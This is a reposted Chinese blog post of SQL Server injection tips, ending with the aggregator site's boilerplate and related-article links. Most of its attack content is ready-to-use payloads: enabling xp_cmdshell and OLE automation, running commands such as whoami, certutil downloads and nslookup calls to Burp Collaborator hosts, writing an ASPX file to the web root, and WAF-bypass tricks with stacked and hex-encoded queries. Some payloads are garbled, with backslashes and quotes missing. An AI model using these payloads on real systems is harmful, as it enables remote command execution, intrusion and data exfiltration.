Sql server注入一些tips

Sql server注入一些tips
sql server环境测试: 几个特性: 1.sql server兼容性可以说是最差的。 举例: select x from y where id=1 字…

	Sql server注入一些tips[数据库教程]

  

sql server环境测试:
几个特性:
1.sql server兼容性可以说是最差的。
举例:
select x from y where id=1
字符串查询
select x from y where id=1

这是会报错的,不允许的
select x from y where id="1"
假设y表有列名name,那么
select x from y where id="name" 为真。
那么利用这个特性我们可以爆破这个表的列名。
sql server下,挖掘注入就是用单引号(),双引号的场景很少,但是也有。

sql server不支持1-1=0这种运算,他会认为你是错误的,两个字符串无法进行相减,如果你是1-0他会进行类型转换不会出错。


修改:
update x set name=admin where id=1
如果id处存在注入,那么本质上就是个where条件查询注入,查询怎么注入他就怎么注入。


update x set name="admin" where id=1 
他会报错,没有人会这样写,用双引号。

测试sql server 修改注入,只能是aaa+bbb=aaabbb,如果可以就是注入。 或者是aaa‘‘aaa‘‘‘
除order by/group by外注入:
环境场景:当输入id->输出id相关数据,输入name,出现name相关数据,可能是order by还有可能是什么?
""是sql servr标识符,而不是字符串,他和mysql不一样
还有可能是这样的: select "name" from x
那么你可以这样去探测:name","id


总结:测试sql server注入使用双引号测试的场景很少,尝试"是不明智的

    

    sql server注入到命令执行一些tips:

    

基础:
开启xp_cmdshell
EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell, 1;RECONFIGURE;

执行命令:
exec master..xp_cmdshell ping dnslog

2.启用sp_oacreate
EXEC sp_configure show advanced options, 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure Ole Automation Procedures, 1;   
RECONFIGURE WITH OVERRIDE;

执行命令:
declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:windowssystem32cmd.exe /c whoami >c:1.txt

;declare+%40shell+int+exec+sp_oacreate+wscript.shell,%40shell+output+exec+sp_oamethod+%40shell,run,null,c%3awindowssystem32
slookup.exe%20"http://2ruqida2pbiyia3mnwnsaiadu40vok.burpcollaborator.net";


;declare+@f+int,@g+int;exec+sp_oacreate+%27Scripting.FileSystemObject%27,@f+output;EXEC+SP_OAMETHOD+@f,%27CreateTextFile%27,@f+OUTPUT,%27d:Dztsztadmin65.txt%27,1;EXEC+sp_oamethod+@f,%27WriteLine%27,null,%27<%@+Page+Language="C%23"%><%+Response.Write("hello,world");+%>%27--
3.调用sp_oamethod

关于bypass:
exec=execute
原语句:execute master..xp_dirtree c:
改造:execute(master..xp_dirtree "c:" )
再次改造:execute(master..xp_dirtree "im86rc9bogsvyfv87zip9sz34uaky9.burpcollaborator.net" )

  技术图片

 

 

 

  

bypass执行命令:
;execute(xp_c%2bmdshell " certutil.exe -urlcache -split -f http://cyen6bl8kg2svupmggzc6dk1zs5it7.burpcollaborator.net");--%20111

 

  

开启xp_cmdshell bypass:
execute("sp_configure show advanced options, 1");RECONFIGURE;execute("sp_configure xp_cmdshell, 1;RECONFIGURE");

sql server专属特性:
select 1e1select user 
相当于执行select 1e1 和select user,bypass waf
select 1e1declare @s varchar (8000) set @s=0x77616974666F722064656C61792027303A303A3227 exec (@s) -- a


案例:
aspx/.net站点支持get/post/cookie

  把get参数放到cookie中:技术图片

 

 

      

Sql server注入一些tips

原文地址:https://www.cnblogs.com/piaomiaohongchen/p/14602368.html

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
转载请注明出处: https://daima100.com/6458.html

(0)
上一篇 2023-04-09
下一篇 2023-04-09

相关推荐

  • Python字符串截取指定内容为中心

    Python字符串截取指定内容为中心Python是一种高级编程语言,它支持多种数据类型,其中字符串是最常用的数据类型之一。字符串截取是Python字符串操作中经常使用的功能之一,可以帮助我们从一个字符串中选取包含指定内容的子字符串。这篇文章将从多个方面探讨Python字符串截取指定内容为中心。

    2024-06-06
    61
  • 使用Pycharm实现多行注释

    使用Pycharm实现多行注释在编写程序的过程中,注释是非常重要的。注释可以帮助其他人理解我们编写的代码,并且可以使我们自己更好地了解代码的功能。本文将介绍如何在Pycharm中实现多行注释。Pycharm是一个非常流行的Python开发环境。它提供了许多功能,其中包括多行注释的支持。

    2024-08-17
    28
  • Python工程师必知:pip是什么

    Python工程师必知:pip是什么Python是当今最为流行的编程语言之一,它广泛应用于各个领域,包括Web开发、数据分析、人工智能等。而在Python生态系统中,有一个非常重要的工具——pip,它是Python的软件包管理器,为我们提供了方便快捷的软件包安装和管理。在这篇文章中,我们将从多个方面探讨pip的作用和使用方法,帮助Python工程师更好地掌握这个工具。

    2024-04-30
    67
  • Dcoke docker-redis 启动警告处理

    Dcoke docker-redis 启动警告处理如果启动前不对Linux内核做任何更改,那么Redis启动会报出警告,共三个:如下图所示 第一个警告:The TCP backlog setting of 511 cannot be enforce…

    2022-12-25
    146
  • mysql 中tinytext、text、mediumtext和longtext详解

    mysql 中tinytext、text、mediumtext和longtext详解一、数字类型 类型 范围 说明 Char(N) [ binary] N=1~255 个字元 binary :分辨大小写 固定长度 std_name cahr(32) not null VarChar…

    2022-12-23
    170
  • 2021年重要战略技术趋势_技术发展的趋势

    2021年重要战略技术趋势_技术发展的趋势前几天,Gartner 发布了企业机构在2023年需要探索的十大战略技术趋势。 Gartner 杰出研究副总裁 Frances Karamouzis 表示:“为了在经济动荡时期增加企业机构的盈利,首席

    2023-06-16
    157
  • JAVA中的事务是什么?事务模块总结[通俗易懂]

    JAVA中的事务是什么?事务模块总结[通俗易懂]大家好,这是一个为了梦想而保持学习的博客。这是第二篇文章,分享一下我对【事务】的理解。文章的风格会一直保持问答的方式讲述,这是我个人喜欢的一种风格,也是相当于模拟面试。 什么是事务? 简单的来说,一…

    2023-02-01
    148
  • 数据库操作之PreparedStatement的使用[通俗易懂]

    数据库操作之PreparedStatement的使用[通俗易懂]PreparedStatement的使用 1.1 PreparedStatement介绍 可以通过调用 Connection 对象的 preparedStatement(String sql) 方法获

    2023-04-14
    155

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注